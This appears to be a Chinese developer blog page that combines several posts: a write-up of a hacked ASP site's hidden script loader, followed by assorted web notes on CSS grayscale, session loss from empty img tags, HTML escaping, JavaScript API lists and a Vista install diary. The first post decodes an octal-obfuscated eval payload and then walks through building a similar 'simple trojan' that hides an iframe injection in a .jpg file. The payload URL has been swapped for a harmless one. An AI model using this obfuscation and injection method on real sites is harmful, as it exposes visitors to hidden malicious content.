博客 (105)

今天访问某 asp 网站时发现不对劲，一看源文件原来网页被挂马了，仔细查看源代码发现：

<script>document.write("<scri");</script>pt src="images/banner.jpg"></script>

这段代码调用了 banner.jpg 这个 js 文件。用记事本打开这个文件发现以下内容：（木马内容已替换成安全内容）

eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\170\157\171\157\172\157\56\155\145\76\74\57\151\146\162\141\155\145\76\47\51")

代码非常整齐，立刻怀疑是 ascii 码的八进制代码。于是解码之，就看到了：（木马内容已替换成安全内容）

document.write('<iframe src=https://xoyozo.net></iframe>')

至此，整个流程已非常清晰了。

八进制转化为十进制

var a = '144';
alert(parseInt(a, 8));  // 输出为 100

十进制转化为八进制

var a = 100;
alert(a.toString(8)); // 输出为 144

ASCII 码转化为字符

var a = 100;
alert(String.fromCharCode(a));  // 输出为 d

字符转化为 ASCII 码

var a = "d";
alert(a.charCodeAt(a));  // 输出为 100

如果用 alert 直接输出编码后的代码，看到的却是原码，下面提供HTML编码和解码：

function HTMLEncode(input) {
  var converter = document.createElement("DIV");
  converter.innerText = input;
  var output = converter.innerHTML;
  converter = null;
  return output;
}

function HTMLDecode(input) {
  var converter = document.createElement("DIV");
  converter.innerHTML = input;
  var output = converter.innerText;
  converter = null;
  return output;
}

您可以比较一下区别：

var a = "document.write('<iframe src=https://xoyozo.net></iframe>')";
document.write(a);

var a = "document.write('<iframe src=https://xoyozo.net></iframe>')";
document.write(HTMLEncode(a));

现在完全可以实现宿主页面执行嵌套 iframe 的效果了。如果需要更隐蔽，可以给 <iframe/> 加上尺寸属性。下面一起来制作一个简单的木马：把

document.write('<iframe src=https://xoyozo.net></iframe>')

编码为

\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\170\157\171\157\172\157\56\155\145\76\74\57\151\146\162\141\155\145\76\47\51

的代码为

var a = "document.write('<iframe src=https://xoyozo.net></iframe>')";
var b = "";
for (var i = 0; i < a.length; i++) {
  b += "\\" + a.charCodeAt(i).toString(8);
}
document.write(HTMLEncode(b));

然后加上 eval() 方法，保存为 .jpg 文件，再通过文章开始介绍的方法调用就行了。

使网页变灰色，只需要一句 css 代码：

html { filter: grayscale(1); }

在 I10 / IE11 上的兼容方案需要 grayscale.js，参考此文：http://www.cnblogs.com/wangmeijian/p/4324693.html

CSS 背景图片变灰：https://stackoverflow.com/questions/16340159/greyscale-background-css-images

HyperLink 使用 ImageUrl 属性时会生成 <a><img /></a> 标签组，而 W3C 验证 XHTML 时 <img/> 必须包含 alt 属性，这时我们不需要把代码改成 <asp:HyperLink><asp:Image> 只需要设置 HyperLink 的 Text 属性即可。

菜单 -> 工具 -> 选项 -> 文本编辑器 -> HTML -> 杂项 -> 在源视图中粘贴元素时自动添加 ID

     今天算是长见识了，项目发布到服务器上面了，但是客户在使用的时候发现，只要进入新增页面和修改页面。再进行操作就会自动跳转到登陆页面（我设置了session保存用户登陆信息），而别的页面就不会出现这个问题。从下午开始找个问题，开始以为不知道只有这两个页面有问题，以为全部都是这样的问题，是IIS的设置问题。我将session的超时时间设置了3个小时，发现还是会跳转到登陆页面。也在web.config文件里面设置了超时时间。但是效果还是一样的。自己测试了一下午，发现只有新增页面和修改页面会出现这样的问题（本机测试没问题/测试服务器上测试也没问题）。经过几次实验，发现确实只有这两个页面会有问题，那就可以断定：不是IIS设置问题，也不是web.config的问题。本地调试也不出现这样的情况，没办法，只能等客户下班之后，没人用了才到正式服务器上去慢慢的调试，最后想个笨办法，将其中一个页面的.cs文件里面的代码一句一句的删掉，可没想到我都将cs文件里面的代码全部删除了，还是会出现这样的情况，我当时就纳闷了。不是事件的问题，难道是HTML页面出了问题？？？

    既然耐着性子删了cs文件的代码。我就继续删！将aspx页面里面的HTML代码和JS代码也一个一个的删掉，一个一个控件删掉测试，从下午上班一直测试到晚上11点，眼睛都看花了，终于，在我将aspx页面的其中几个控件删除之后发现问题了！页面不跳转了！这下来劲了，肯定是这几个控件的原因，于是乎，我就一个一个控件还原回去，不跳转！继续还原！！当我还原到<img src="" >这个控件的时候测试，发现问题了！只要我一加上<img src="">这个标签！页面就跳转到登陆页面了。问题肯定出在这了！但是我又想不通了，为什么就这个HTML标签一加上就会出问题，这应该不关session什么事啊，怎么会加上这个标签页面就直接跳转了呢？

     在网上找了下资料，没找到相关的资料，后来试着将img 标签的src=""加上图片，src="imges/001.jpg" 再测试，发现页面不跳转了！！原来问题出现在这里！

src=""为空的情况下，可能导致session丢失！跟经理说了下这个情况，他也很惊奇还没见过一个HTML标签会导致session丢失的情况，因为在本地和测试服务器上测试的时候都没这样的情况，后来猜测了下，可能是IIS的问题，可能是IIS解析的时候解析到src=""这个地方解析不了，导致程序出问题。但这只是个人猜测，正式服务器上我也没权力当时去打补丁，一个大公司的正式服务器，我要打补丁去了，那他们别的网站和系统不全当机了？所以就只要想了个办法，将src=""里面加上图片，幸好这个img标签是隐藏起来的，加了也不影响界面。呵呵。。。

    最让人郁闷的是我测试的时候是用Symantec pcAnywhere这个软件远程连接到的正式服务器上。反应慢得可以，简直比电脑没装显卡驱动还慢...唉，不过累也累了，以后碰到这样的情况就有经验了。

    我不知道网上有没有人碰到过跟我一样的情况；如果碰到了，希望能给你带来点灵感。哇哈哈。。。

做网页的朋友应该都知道常用的几个HTML转义符，如“&nbsp;”表示空格，“&gt;”表示“>”等，但是有时候我们为了网页的文字不被搜索引擎收录，比如评论信息，这时可以用同样的方法去转义汉字等各种字符，一般格式为 "&#"+ASCII+";"，如“中华人民共和国”可以转义为“&#20013;&#21326;&#20154;&#27665;&#20849;&#21644;&#22269;”。

在C#中可以这样来实现：

private string htmlEscape(string s)
{
    StringBuilder sb = new StringBuilder();
    foreach (char c in s)
    {
        sb.Append("&#" + (int)c + ";");
    }
    return sb.ToString();
}

代码：

说明：

该代码兼容性非常差，在XHTML文档中或在非IE浏览下浏览均不能达到预期效果，原因可能是它们的 select 元素的 z-index 太高，并且 css 定位方式不同，部署于应用还需改进代码。

方法：
    write,向HTML动态写入内容
    writeln，多加一个换行
    open,与window.open类似，不建议用
    close,当向新打开的文档对象中写完所有的内容后，一定要调用该方法关闭文档流
    clear,用于清除文档中的所有内容，建议用document.write("");document.close();这两条语句来实现同样的功能。
    getElementById,返回id的对象
    getElementByName,返回name的对象组（注意是数组）
    getElementByTagName,返回标签名的对象组
    createElement,产生一个代表某个HTML元素的对象，随后再其它方法将这个对象插入到文档中。
    createStyleSheet,为当前HTML产生一个样式表或增加一条样式规则。
属性：
    document.cookie

方法：
   alert,对话框，OK按钮
   confirm,对话框，OK和Cancel按钮
   prompt,对话框，可输入
   close，关闭当前浏览器窗口
   navigate，在当前窗口中导航到指定的URL资源
   setInterval，设置每隔一定时间调用指定程序代码，毫秒，setInterval("Func()",5000)
   setTimeout,设置经过一定时间后执行一次指定程序代码，毫秒，setTimeout("Func()",5000)
   clearInterval,
   clearTimeout,
   moveTo，将浏览器窗口移动到屏幕上的某个位置
   resizeTo,改变浏览器窗口的大小
   open，打开一个新窗口 window.open("abc.html","_blank","top=0,left=0,width=100,height=200,toolbar=no");
   showModalDialog产生一个模态对话框
   showModelessDialog产生一个非模态对话框窗口
属性：
    closed
    opener
    defaultstatus
    status
    screenTop
    screenLeft
事件：
    onload,onunload,onmouseover,...
对象属性：
    location对象：设置和返回当前网页的URL信息。
        载入一个新的网页：window.location.href="http://g.cn";
        刷新当前页：window.location.reload();
    event对象：获取和设置当前事件的有关信息。
        altKey属性，用于检测事件发生时Alt键是否被按下
        ctrlKey。。。
        shiftKey...
        screenX,screenY设置和返回鼠标相对屏幕顶点的x,y坐标
        offsetX,offsetY设置和返回鼠标相对事件源顶点的x,y坐标
        x,y 设置和返回鼠标相对事件源的父元素顶点x,y坐标
        returnValue设置和返回事件的返回值，一般情况下设置为false
        cancelBubble设置和返回当前事件是否继续向下传递
        srcElement设置和返回事件源对象
        keyCode设置和返回键盘按下或弹起时的键的unicode码
        button检索鼠标动作使用的是哪个按键，1左鍵，2右键，3左右同时
function window_onkeypress()
{
//    alert(window.event.keyCode);
    if(window.event.keyCode==27)
    {
        window.close();
    }
}

老总总会随时扔台他朋友的本本叫我杀个毒装个软件什么的，很多都是新机预装 Vista。接触多了终于心痒痒升级自己的 Windows。其实一直想装的，可惜我的光驱只能 CD 刻录，而且跑遍整个萧山都找不到有 Vista 光盘卖，装双系统么又花时间又占空间。幸好一凡家有台记录机，所以趁周末去刻了张盘。第二天急匆匆地跑去公司，花了两个多小时把本本上将40G的东西传到服务器上备份，然后重新分区安装。

之前是有看过远景上关于安装方面的贴子，生怕中间出问题又上不了网就麻烦了。不过还是出问题了，在复制完文件后自动重启，就出现下面的错误：

我没动过任何硬件，出现这样的错误很是摸不着头脑，想到可能的原因有：刻盘时出了问题；需要 SATA 硬盘驱动；内存不兼容……没办法，还是先找台电脑上网查查吧。身边的服务器没无线网卡不能上网，尝试在服务器安装 Nokia PC 套件还不兼容 Windows server 2003，不支持蓝牙连接。还是去其它办公室借电脑上好了。哎，不出我所料，又被逮到帮他们杀毒！汗。在网上找了半天没搜出个结果来，看来用 Vista 的人还不多，出现我的问题的人更少，我只搜到 error info 跟我相同，但 file 不同的贴子，还是没有回答的。

回来，装了两遍还是出现同样的错误，火了，先装个 XP，在 XP 下试试。漫长的等待是用电脑报打发的。。。

OK，XP 装在 D 盘，想检查是不是 SATA 硬盘的缘故，想装了 XP 应该已经有驱动了，就重起通过光盘安装 Vista 到 C 盘，啊哦，老错误。（高手别笑我，这步我都觉得荒谬）

晕，忘了 boot.ini 是在 C 盘的，进不了 XP 了，又再装了遍 XP 到 D 盘。怕了怕了，还是用镜像文件装吧。也不去研究什么原因导致的了，哎不是我的风格，可是时间宝贵呐。

老老实实装完 XP 又用虚拟光驱装入镜像，再次安装 Vista，哎，终于让我揭开她的面纱了！

一天就这么过去了，第二天继续。

Vista 已经基本解决驱动问题了，很省事，不过我还是去 HP 英文官网下了专用的驱动程序。

嗯，开始安装程序。其实 Vista 的 UAC 确实挺烦人的，特别是安装程序的时候，不过我是习惯了“用管理员身份运行”，可突然的黑屏一闪还是会让习惯的人慌一下。

在安装 .msi 程序的时候有时候会提示安装不正常，您的权限需要提升之类的错误，但无法在右键菜单找到“用管理员身份运行”项，我是这么解决的：建一个后缀名为 .cmd 的文件，写入内容：“msiexec /i C:\msi文件的地址”。然后“用管理员身份运行”这个 .cmd 文件就行了。

装完常用软件开始安装 VS 这个大家伙了。

给 C 盘分的 20 个 G 已经用了 12 个了，之前用的是 VS2005，还没装过 VS2008，所以不知道要占多少空间。前几天看过一篇文章是关于在 Vista 下安装 VS 和 SQL Server 的，作者提到的先装 VS 后装 SSMS 出错误的情况，前车之鉴，我先装了 SSMS。

最头痛的要算 IIS7 了。装入 Vista 镜像，控制面板－程序－打开或关闭 Windows 功能，参照一篇文章勾选了相关的安装项，见文。虽然我不需要在 VS2005 下调试程序，但是我暂时不想把程序框架从 2.0 升到 3.5，这几天全国范围寻找 .net 3.5 的空间商未果，真想自己弄台服务器卖空间，早起的鸟应该会有虫吃。我觉得空间商是怕技术这关，毕竟新技术万一出问题很有可能一下子解决不了，作为一个运营商就有可能被要求赔偿损失或吃官司之类的。扯远了。。。

装完 IIS7，试着架设我的 2.0 网站，经典应用程序池，身份验证，一切配置完毕，结果运行时还是出现了“IIS Worker Process 已停止工作”的对话框，偶尔出现，而且出现几次后，应用程序池就自动关闭了，用纯 HTML 站测试也一样，又把 IIS 卸了装，还是一样。试了两天没结果，希望各位达人指点！

这几天用 Vista 眼睛受不了，漂亮的外表还是很伤人的，就跟玫瑰有刺同一个道理。Areo，雅黑，梦幻桌面，让我的眼睛云里雾里的，害我拼命滴眼药水。

不过总的来说，I love vista! 推荐配置不错的朋友可以考虑升级。